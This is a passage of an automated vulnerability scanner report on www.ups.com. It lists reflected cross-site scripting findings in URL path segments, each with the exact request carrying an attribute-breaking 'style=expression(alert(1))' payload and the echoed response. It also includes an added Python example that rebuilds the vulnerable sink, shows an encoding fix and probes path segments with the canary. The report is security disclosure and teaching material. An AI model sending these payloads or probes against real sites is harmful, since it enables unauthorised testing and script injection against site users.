Date: Mon, 14 Feb 2011 01:25:11 GMT
Server: Apache
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 50161


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<HTML>

<HEAD>
<META NAME="DCSext.pgf_Site" CONTENT="Country">
<META NAME="DCSext.pCC" CONTENT="US">
<META NAME="DCSex
...[SNIP]...
<input type="Hidden" id="cclamp_sreturn" name="sret" value="http://www.ups.com/content/usbe5e8"style="x:expression(alert(1))"2bd8dfca6c2/en/resources/ship/terms/privacy.html">
...[SNIP]...

1.369. http://www.ups.com/content/us/en/resources/ship/terms/privacy.html [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.ups.com
Path:   /content/us/en/resources/ship/terms/privacy.html

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2efc9"style%3d"x%3aexpression(alert(1))"e2d5151843d was submitted in the REST URL parameter 3. This input was echoed as 2efc9"style="x:expression(alert(1))"e2d5151843d in the application's response.

This proof of concept shows that arbitrary JavaScript can be injected into the application's response. The payload closes the double-quoted attribute value with a literal double quote and appends a style attribute whose CSS expression() is evaluated as JavaScript. Note that expression() only works in Internet Explorer's legacy rendering modes and will not work in other browsers; the underlying defect, a double quote reflected unencoded inside an attribute value, is browser-independent and can be exploited with other attribute-context payloads.

Request

GET /content/us/en2efc9"style%3d"x%3aexpression(alert(1))"e2d5151843d/resources/ship/terms/privacy.html?WT.svl=Footer HTTP/1.1
Host: www.ups.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: webappcommon.cclamp.usb.acceptsCookie=Yes; defaultHome=us_en_home|1297646118906;

Response

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:25:16 GMT
Server: Apache
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 50629


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<HTML>

<HEAD>
<META NAME="DCSext.pgf_Site" CONTENT="Country">
<META NAME="DCSext.pCC" CONTENT="US">
<META NAME="DCSex
...[SNIP]...
<input type="Hidden" id="cclamp_sreturn" name="sret" value="http://www.ups.com/content/us/en2efc9"style="x:expression(alert(1))"e2d5151843d/resources/ship/terms/privacy.html?WT.svl=Footer">
...[SNIP]...

1.370. http://www.ups.com/content/us/en/resources/ship/terms/shipping/index.html [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.ups.com
Path:   /content/us/en/resources/ship/terms/shipping/index.html

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1657c"style%3d"x%3aexpression(alert(1))"d0105cd917d was submitted in the REST URL parameter 2. This input was echoed as 1657c"style="x:expression(alert(1))"d0105cd917d in the application's response.

This proof of concept shows that arbitrary JavaScript can be injected into the application's response. The payload closes the double-quoted attribute value with a literal double quote and appends a style attribute whose CSS expression() is evaluated as JavaScript. Note that expression() only works in Internet Explorer's legacy rendering modes and will not work in other browsers; the underlying defect, a double quote reflected unencoded inside an attribute value, is browser-independent and can be exploited with other attribute-context payloads.

Request

GET /content/us1657c"style%3d"x%3aexpression(alert(1))"d0105cd917d/en/resources/ship/terms/shipping/index.html HTTP/1.1
Host: www.ups.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: webappcommon.cclamp.usb.acceptsCookie=Yes; defaultHome=us_en_home|1297646118906;

Response

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:25:07 GMT
Server: Apache
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 35099


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<HTML>

<HEAD>
<META NAME="DCSext.pgf_Site" CONTENT="Country">
<META NAME="DCSext.pCC" CONTENT="US">
<META NAME="DCSex
...[SNIP]...
<input type="Hidden" id="cclamp_sreturn" name="sret" value="http://www.ups.com/content/us1657c"style="x:expression(alert(1))"d0105cd917d/en/resources/ship/terms/shipping/index.html">
...[SNIP]...

1.371. http://www.ups.com/content/us/en/resources/ship/terms/shipping/index.html [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.ups.com
Path:   /content/us/en/resources/ship/terms/shipping/index.html

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c72a4"style%3d"x%3aexpression(alert(1))"ed012a4aeed was submitted in the REST URL parameter 3. This input was echoed as c72a4"style="x:expression(alert(1))"ed012a4aeed in the application's response.

This proof of concept shows that arbitrary JavaScript can be injected into the application's response. The payload closes the double-quoted attribute value with a literal double quote and appends a style attribute whose CSS expression() is evaluated as JavaScript. Note that expression() only works in Internet Explorer's legacy rendering modes and will not work in other browsers; the underlying defect, a double quote reflected unencoded inside an attribute value, is browser-independent and can be exploited with other attribute-context payloads.

Request

GET /content/us/enc72a4"style%3d"x%3aexpression(alert(1))"ed012a4aeed/resources/ship/terms/shipping/index.html HTTP/1.1
Host: www.ups.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: webappcommon.cclamp.usb.acceptsCookie=Yes; defaultHome=us_en_home|1297646118906;

Response

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:25:13 GMT
Server: Apache
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 35099


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<HTML>

<HEAD>
<META NAME="DCSext.pgf_Site" CONTENT="Country">
<META NAME="DCSext.pCC" CONTENT="US">
<META NAME="DCSex
...[SNIP]...
<input type="Hidden" id="cclamp_sreturn" name="sret" value="http://www.ups.com/content/us/enc72a4"style="x:expression(alert(1))"ed012a4aeed/resources/ship/terms/shipping/index.html">
...[SNIP]...
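Every finding in this part of the run (1.371 onward, and the tail of 1.370 above) has the same shape: a URL path segment is echoed into the value attribute of the hidden cclamp_sreturn input without attribute encoding. The Python below is an added example, not code from the report or from ups.com. vulnerable_render is an assumed reconstruction of that sink, safe_render is the same sink with attribute-context encoding applied, and probe reproduces the scanner's canary technique against both, using a constructed copy of the path from finding 1.371. Parsing the rendered tag the way a browser would shows the difference that matters: with the vulnerable sink the element acquires a new style attribute; with the fix the whole canary stays inside value.

```python
import html
from html.parser import HTMLParser
from urllib.parse import quote, unquote

# Same shape as the report's payloads, without the random hex markers the
# scanner adds on each side to locate the reflection.
CANARY = '"style="x:expression(alert(1))"'

# Constructed sample: the path from finding 1.371. Segment 1 is "content",
# segment 2 is "us", segment 3 is "en", matching the report's numbering.
SAMPLE_PATH = "/content/us/en/resources/ship/terms/shipping/index.html"


def inject_into_segment(path: str, segment_index: int, payload: str) -> str:
    """Append payload to the 1-based path segment the report calls
    'REST URL parameter N'. Encoding matches the report's requests: the
    quote and parentheses are sent literally, '=' and ':' become %3D and %3A."""
    parts = path.split("/")          # parts[0] is '' because of the leading '/'
    if not 1 <= segment_index < len(parts):
        raise ValueError(f"path has no REST URL parameter {segment_index}")
    parts[segment_index] += quote(payload, safe='"()')
    return "/".join(parts)


def vulnerable_render(request_path: str) -> str:
    """Assumed reconstruction of the sink seen in the findings: the decoded
    request path is concatenated into a double-quoted attribute value with
    no output encoding."""
    return ('<input type="Hidden" id="cclamp_sreturn" name="sret" '
            'value="http://www.ups.com' + unquote(request_path) + '">')


def safe_render(request_path: str) -> str:
    """Hardened form: html.escape(..., quote=True) turns '"' into &quot;, so
    the reflected text can no longer terminate the value attribute."""
    return ('<input type="Hidden" id="cclamp_sreturn" name="sret" '
            'value="http://www.ups.com'
            + html.escape(unquote(request_path), quote=True) + '">')


class _InputAttrs(HTMLParser):
    """Collects the attributes a parser sees on the <input> start tag."""

    def __init__(self) -> None:
        super().__init__()
        self.attrs: dict = {}

    def handle_starttag(self, tag, attrs):
        if tag == "input":
            self.attrs = dict(attrs)


def input_attributes(fragment: str) -> dict:
    parser = _InputAttrs()
    parser.feed(fragment)
    parser.close()
    return parser.attrs


def probe(render, path: str, segment_index: int) -> dict:
    """Send one canary into one REST URL parameter and report the outcome.

    'reflected' is the scanner's own check (payload present verbatim in the
    response). 'style_injected' is the stronger check that the quote really
    broke out of the attribute and created a style attribute on the element.
    """
    request_path = inject_into_segment(path, segment_index, CANARY)
    body = render(request_path)
    attrs = input_attributes(body)
    return {
        "request_path": request_path,
        "reflected": CANARY in body,
        "style_injected": "style" in attrs,
        "value": attrs.get("value", ""),
    }


if __name__ == "__main__":
    for idx in (2, 3):
        print(f"REST URL parameter {idx}, vulnerable:", probe(vulnerable_render, SAMPLE_PATH, idx))
        print(f"REST URL parameter {idx}, hardened: ", probe(safe_render, SAMPLE_PATH, idx))
```

The "reflected" check alone is what the report's Confidence: Certain rests on; the attribute-level check is the one to use when confirming a fix, since encoding that merely strips the expression() keyword would still pass the substring test in the negative while leaving the quote break-out in place.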

1.372. http://www.ups.com/content/us/en/resources/ship/terms/use.html [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.ups.com
Path:   /content/us/en/resources/ship/terms/use.html

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9e5ab"style%3d"x%3aexpression(alert(1))"1918f7292db was submitted in the REST URL parameter 2. This input was echoed as 9e5ab"style="x:expression(alert(1))"1918f7292db in the application's response.

This proof of concept shows that the input reaches the response unencoded inside a double-quoted attribute value: the payload's leading quote closes the value attribute, and the remainder adds a style attribute containing a CSS expression(), which older versions of Internet Explorer evaluate as JavaScript. Other browsers ignore expression(), so this particular payload is specific to Internet Explorer, although the unencoded reflection it relies on is not. The payload contains no < or > characters, so this finding does not show whether those are reflected unencoded as well, which would allow closing the tag and injecting markup that any browser executes.

Request

GET /content/us9e5ab"style%3d"x%3aexpression(alert(1))"1918f7292db/en/resources/ship/terms/use.html HTTP/1.1
Host: www.ups.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: webappcommon.cclamp.usb.acceptsCookie=Yes; defaultHome=us_en_home|1297646118906;

Response

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:25:12 GMT
Server: Apache
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 75964


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<HTML>

<HEAD>
<META NAME="DCSext.pgf_Site" CONTENT="Country">
<META NAME="DCSext.pCC" CONTENT="US">
<META NAME="DCSex
...[SNIP]...
<input type="Hidden" id="cclamp_sreturn" name="sret" value="http://www.ups.com/content/us9e5ab"style="x:expression(alert(1))"1918f7292db/en/resources/ship/terms/use.html">
...[SNIP]...

1.373. http://www.ups.com/content/us/en/resources/ship/terms/use.html [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.ups.com
Path:   /content/us/en/resources/ship/terms/use.html

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 36adc"style%3d"x%3aexpression(alert(1))"4da2f01a87e was submitted in the REST URL parameter 3. This input was echoed as 36adc"style="x:expression(alert(1))"4da2f01a87e in the application's response.

This proof of concept shows that the input reaches the response unencoded inside a double-quoted attribute value: the payload's leading quote closes the value attribute, and the remainder adds a style attribute containing a CSS expression(), which older versions of Internet Explorer evaluate as JavaScript. Other browsers ignore expression(), so this particular payload is specific to Internet Explorer, although the unencoded reflection it relies on is not. The payload contains no < or > characters, so this finding does not show whether those are reflected unencoded as well, which would allow closing the tag and injecting markup that any browser executes.

Request

GET /content/us/en36adc"style%3d"x%3aexpression(alert(1))"4da2f01a87e/resources/ship/terms/use.html HTTP/1.1
Host: www.ups.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: webappcommon.cclamp.usb.acceptsCookie=Yes; defaultHome=us_en_home|1297646118906;

Response

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:25:13 GMT
Server: Apache
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 76404


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<HTML>

<HEAD>
<META NAME="DCSext.pgf_Site" CONTENT="Country">
<META NAME="DCSext.pCC" CONTENT="US">
<META NAME="DCSex
...[SNIP]...
<input type="Hidden" id="cclamp_sreturn" name="sret" value="http://www.ups.com/content/us/en36adc"style="x:expression(alert(1))"4da2f01a87e/resources/ship/terms/use.html">
...[SNIP]...

1.374. http://www.ups.com/content/us/en/resources/start/index.html [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.ups.com
Path:   /content/us/en/resources/start/index.html

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f4af5"style%3d"x%3aexpression(alert(1))"4ad883a8c4a was submitted in the REST URL parameter 2. This input was echoed as f4af5"style="x:expression(alert(1))"4ad883a8c4a in the application's response.

This proof of concept shows that the input reaches the response unencoded inside a double-quoted attribute value: the payload's leading quote closes the value attribute, and the remainder adds a style attribute containing a CSS expression(), which older versions of Internet Explorer evaluate as JavaScript. Other browsers ignore expression(), so this particular payload is specific to Internet Explorer, although the unencoded reflection it relies on is not. The payload contains no < or > characters, so this finding does not show whether those are reflected unencoded as well, which would allow closing the tag and injecting markup that any browser executes.

Request

GET /content/usf4af5"style%3d"x%3aexpression(alert(1))"4ad883a8c4a/en/resources/start/index.html HTTP/1.1
Host: www.ups.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: webappcommon.cclamp.usb.acceptsCookie=Yes; defaultHome=us_en_home|1297646118906;

Response

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:25:06 GMT
Server: Apache
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 42424


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<HTML>

<HEAD>
<META NAME="DCSext.pgf_Site" CONTENT="Country">
<META NAME="DCSext.pCC" CONTENT="US">
<META NAME="DCSex
...[SNIP]...
<input type="Hidden" id="cclamp_sreturn" name="sret" value="http://www.ups.com/content/usf4af5"style="x:expression(alert(1))"4ad883a8c4a/en/resources/start/index.html">
...[SNIP]...

1.375. http://www.ups.com/content/us/en/resources/start/index.html [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.ups.com
Path:   /content/us/en/resources/start/index.html

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2df07"style%3d"x%3aexpression(alert(1))"09777fba220 was submitted in the REST URL parameter 3. This input was echoed as 2df07"style="x:expression(alert(1))"09777fba220 in the application's response.

This proof of concept shows that the input reaches the response unencoded inside a double-quoted attribute value: the payload's leading quote closes the value attribute, and the remainder adds a style attribute containing a CSS expression(), which older versions of Internet Explorer evaluate as JavaScript. Other browsers ignore expression(), so this particular payload is specific to Internet Explorer, although the unencoded reflection it relies on is not. The payload contains no < or > characters, so this finding does not show whether those are reflected unencoded as well, which would allow closing the tag and injecting markup that any browser executes.

Request

GET /content/us/en2df07"style%3d"x%3aexpression(alert(1))"09777fba220/resources/start/index.html HTTP/1.1
Host: www.ups.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: webappcommon.cclamp.usb.acceptsCookie=Yes; defaultHome=us_en_home|1297646118906;

Response

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:25:07 GMT
Server: Apache
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 42424


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<HTML>

<HEAD>
<META NAME="DCSext.pgf_Site" CONTENT="Country">
<META NAME="DCSext.pCC" CONTENT="US">
<META NAME="DCSex
...[SNIP]...
<input type="Hidden" id="cclamp_sreturn" name="sret" value="http://www.ups.com/content/us/en2df07"style="x:expression(alert(1))"09777fba220/resources/start/index.html">
...[SNIP]...

1.376. http://www.ups.com/content/us/en/resources/techsupport/index.html [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.ups.com
Path:   /content/us/en/resources/techsupport/index.html

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9f1df"style%3d"x%3aexpression(alert(1))"83776d167cc was submitted in the REST URL parameter 2. This input was echoed as 9f1df"style="x:expression(alert(1))"83776d167cc in the application's response.

This proof of concept shows that the input reaches the response unencoded inside a double-quoted attribute value: the payload's leading quote closes the value attribute, and the remainder adds a style attribute containing a CSS expression(), which older versions of Internet Explorer evaluate as JavaScript. Other browsers ignore expression(), so this particular payload is specific to Internet Explorer, although the unencoded reflection it relies on is not. The payload contains no < or > characters, so this finding does not show whether those are reflected unencoded as well, which would allow closing the tag and injecting markup that any browser executes.

Request

GET /content/us9f1df"style%3d"x%3aexpression(alert(1))"83776d167cc/en/resources/techsupport/index.html HTTP/1.1
Host: www.ups.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: webappcommon.cclamp.usb.acceptsCookie=Yes; defaultHome=us_en_home|1297646118906;

Response

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:25:19 GMT
Server: Apache
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 45127


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<HTML>

<HEAD>
<META NAME="DCSext.pgf_Site" CONTENT="Country">
<META NAME="DCSext.pCC" CONTENT="US">
<META NAME="DCSex
...[SNIP]...
<input type="Hidden" id="cclamp_sreturn" name="sret" value="http://www.ups.com/content/us9f1df"style="x:expression(alert(1))"83776d167cc/en/resources/techsupport/index.html">
...[SNIP]...

1.377. http://www.ups.com/content/us/en/resources/techsupport/index.html [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.ups.com
Path:   /content/us/en/resources/techsupport/index.html

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4ff19"style%3d"x%3aexpression(alert(1))"b13ed736f3 was submitted in the REST URL parameter 3. This input was echoed as 4ff19"style="x:expression(alert(1))"b13ed736f3 in the application's response.

This proof of concept shows that the input reaches the response unencoded inside a double-quoted attribute value: the payload's leading quote closes the value attribute, and the remainder adds a style attribute containing a CSS expression(), which older versions of Internet Explorer evaluate as JavaScript. Other browsers ignore expression(), so this particular payload is specific to Internet Explorer, although the unencoded reflection it relies on is not. The payload contains no < or > characters, so this finding does not show whether those are reflected unencoded as well, which would allow closing the tag and injecting markup that any browser executes.

Request

GET /content/us/en4ff19"style%3d"x%3aexpression(alert(1))"b13ed736f3/resources/techsupport/index.html HTTP/1.1
Host: www.ups.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: webappcommon.cclamp.usb.acceptsCookie=Yes; defaultHome=us_en_home|1297646118906;

Response

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:25:22 GMT
Server: Apache
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 45125


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<HTML>

<HEAD>
<META NAME="DCSext.pgf_Site" CONTENT="Country">
<META NAME="DCSext.pCC" CONTENT="US">
<META NAME="DCSex
...[SNIP]...
<input type="Hidden" id="cclamp_sreturn" name="sret" value="http://www.ups.com/content/us/en4ff19"style="x:expression(alert(1))"b13ed736f3/resources/techsupport/index.html">
...[SNIP]...

1.378. http://www.ups.com/content/us/en/resources/track/index.html [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.ups.com
Path:   /content/us/en/resources/track/index.html

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f30c7"style%3d"x%3aexpression(alert(1))"1c7f06c7cef was submitted in the REST URL parameter 2. This input was echoed as f30c7"style="x:expression(alert(1))"1c7f06c7cef in the application's response.

This proof of concept shows that the input reaches the response unencoded inside a double-quoted attribute value: the payload's leading quote closes the value attribute, and the remainder adds a style attribute containing a CSS expression(), which older versions of Internet Explorer evaluate as JavaScript. Other browsers ignore expression(), so this particular payload is specific to Internet Explorer, although the unencoded reflection it relies on is not. The payload contains no < or > characters, so this finding does not show whether those are reflected unencoded as well, which would allow closing the tag and injecting markup that any browser executes.

Request

GET /content/usf30c7"style%3d"x%3aexpression(alert(1))"1c7f06c7cef/en/resources/track/index.html HTTP/1.1
Host: www.ups.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: webappcommon.cclamp.usb.acceptsCookie=Yes; defaultHome=us_en_home|1297646118906;

Response

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:25:12 GMT
Server: Apache
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 42703


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<HTML>

<HEAD>
<META NAME="DCSext.pgf_Site" CONTENT="Country">
<META NAME="DCSext.pCC" CONTENT="US">
<META NAME="DCSex
...[SNIP]...
<input type="Hidden" id="cclamp_sreturn" name="sret" value="http://www.ups.com/content/usf30c7"style="x:expression(alert(1))"1c7f06c7cef/en/resources/track/index.html">
...[SNIP]...

1.379. http://www.ups.com/content/us/en/resources/track/index.html [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.ups.com
Path:   /content/us/en/resources/track/index.html

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 96d3c"style%3d"x%3aexpression(alert(1))"7996a1d6184 was submitted in the REST URL parameter 3. This input was echoed as 96d3c"style="x:expression(alert(1))"7996a1d6184 in the application's response.

This proof of concept shows that the input reaches the response unencoded inside a double-quoted attribute value: the payload's leading quote closes the value attribute, and the remainder adds a style attribute containing a CSS expression(), which older versions of Internet Explorer evaluate as JavaScript. Other browsers ignore expression(), so this particular payload is specific to Internet Explorer, although the unencoded reflection it relies on is not. The payload contains no < or > characters, so this finding does not show whether those are reflected unencoded as well, which would allow closing the tag and injecting markup that any browser executes.

Request

GET /content/us/en96d3c"style%3d"x%3aexpression(alert(1))"7996a1d6184/resources/track/index.html HTTP/1.1
Host: www.ups.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: webappcommon.cclamp.usb.acceptsCookie=Yes; defaultHome=us_en_home|1297646118906;

Response

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:25:13 GMT
Server: Apache
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 43143


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<HTML>

<HEAD>
<META NAME="DCSext.pgf_Site" CONTENT="Country">
<META NAME="DCSext.pCC" CONTENT="US">
<META NAME="DCSex
...[SNIP]...
<input type="Hidden" id="cclamp_sreturn" name="sret" value="http://www.ups.com/content/us/en96d3c"style="x:expression(alert(1))"7996a1d6184/resources/track/index.html">
...[SNIP]...

1.380. http://www.ups.com/content/us/en/shipping/index.html [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.ups.com
Path:   /content/us/en/shipping/index.html

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2f8ea"style%3d"x%3aexpression(alert(1))"c56152e9033 was submitted in the REST URL parameter 2. This input was echoed as 2f8ea"style="x:expression(alert(1))"c56152e9033 in the application's response.

This proof of concept shows that the input reaches the response unencoded inside a double-quoted attribute value: the payload's leading quote closes the value attribute, and the remainder adds a style attribute containing a CSS expression(), which older versions of Internet Explorer evaluate as JavaScript. Other browsers ignore expression(), so this particular payload is specific to Internet Explorer, although the unencoded reflection it relies on is not. The payload contains no < or > characters, so this finding does not show whether those are reflected unencoded as well, which would allow closing the tag and injecting markup that any browser executes.

Request

GET /content/us2f8ea"style%3d"x%3aexpression(alert(1))"c56152e9033/en/shipping/index.html HTTP/1.1
Host: www.ups.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: webappcommon.cclamp.usb.acceptsCookie=Yes; defaultHome=us_en_home|1297646118906;

Response

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:24:54 GMT
Server: Apache
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 58458


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<HTML>

<HEAD>
<META NAME="DCSext.pgf_Site" CONTENT="Country">
<META NAME="DCSext.pCC" CONTENT="US">
<META NAME="DCSex
...[SNIP]...
<input type="Hidden" id="cclamp_sreturn" name="sret" value="http://www.ups.com/content/us2f8ea"style="x:expression(alert(1))"c56152e9033/en/shipping/index.html">
...[SNIP]...

1.381. http://www.ups.com/content/us/en/shipping/index.html [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.ups.com
Path:   /content/us/en/shipping/index.html

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 17ab7"style%3d"x%3aexpression(alert(1))"0664130560d was submitted in the REST URL parameter 3. This input was echoed as 17ab7"style="x:expression(alert(1))"0664130560d in the application's response.

This proof of concept shows that the input reaches the response unencoded inside a double-quoted attribute value: the payload's leading quote closes the value attribute, and the remainder adds a style attribute containing a CSS expression(), which older versions of Internet Explorer evaluate as JavaScript. Other browsers ignore expression(), so this particular payload is specific to Internet Explorer, although the unencoded reflection it relies on is not. The payload contains no < or > characters, so this finding does not show whether those are reflected unencoded as well, which would allow closing the tag and injecting markup that any browser executes.

Request

GET /content/us/en17ab7"style%3d"x%3aexpression(alert(1))"0664130560d/shipping/index.html HTTP/1.1
Host: www.ups.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: webappcommon.cclamp.usb.acceptsCookie=Yes; defaultHome=us_en_home|1297646118906;

Response

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:24:56 GMT
Server: Apache
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 58028


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<HTML>

<HEAD>
<META NAME="DCSext.pgf_Site" CONTENT="Country">
<META NAME="DCSext.pCC" CONTENT="US">
<META NAME="DCSex
...[SNIP]...
<input type="Hidden" id="cclamp_sreturn" name="sret" value="http://www.ups.com/content/us/en17ab7"style="x:expression(alert(1))"0664130560d/shipping/index.html">
...[SNIP]...

1.382. http://www.ups.com/content/us/en/shipping/time/service/index.html [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.ups.com
Path:   /content/us/en/shipping/time/service/index.html

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d4ac1"style%3d"x%3aexpression(alert(1))"17b4988c95f was submitted in the REST URL parameter 2. This input was echoed as d4ac1"style="x:expression(alert(1))"17b4988c95f in the application's response.

